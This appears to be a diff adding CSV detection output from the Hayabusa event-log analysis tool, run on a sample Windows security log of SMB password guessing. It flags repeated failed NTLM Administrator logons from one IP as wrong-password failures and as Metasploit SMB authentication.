+2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4lnVe7qNVEspxFV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Phei86bKte1UCbMi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehA1LQ2Rs0Wts9JW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WcXtnkpww8HlSBb3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y8U7FrQZgDvQ09Uq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UgWwCtz3Gnoq9zYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRNPwCogYrwSGeZf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6O9rWY8UGCbuhSwZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuH4avUJ4AwqXTGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: japOFEaHgyT3T2fO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXpRMMNJRgjmd4km  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtTXA6BiiVyv42cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wfYkwvNOfKj7rlTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzAZyceDjfmUOdz6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0Qais0cF8avXJQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7KBM2fIEK6pEl7F2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N3stckaysFk58QAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oVK4S15DDLWISQ7i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAA1bFLD5YMohS9q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k5V3sfIsj4kYtaGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJw4MBG0cvIz2fMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXJ0UBfKCzLXJ5y0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z3A2mmYGcjHBbX3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oGlR6pBLnDrzMsqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gv7nWzZ1HN9mgTya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dnPUb3w2d7Ltif2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCWXdvBeDPpeKhWJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GN3OXSzQqLDF348i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAWiBhYPNQ0RUuOX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5CBG3hblqr8kvWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MDBaKpfYttm4H1gj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PNszt6piEznMlTdF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iqmBPOQIG6M1rZjX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJs7tuZpsPMYJHOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LUT5oe2DwS5vW84K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3OTe0uiDHhf5GzRL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71TuxFRZFyZEQp1S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRvTmizOLj3UUpD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LnQEZPWaN2OkpTLa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnHR9DAtgzu561sx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfBl3dbluZ7GiFum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Hlgn7gsZwRvlXAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eyHVPtGpnmmRjJuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0l3QC0rLt9yGaIe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XfEng3JgXLmgI8GN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ORIegzlkHy8AX6RW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
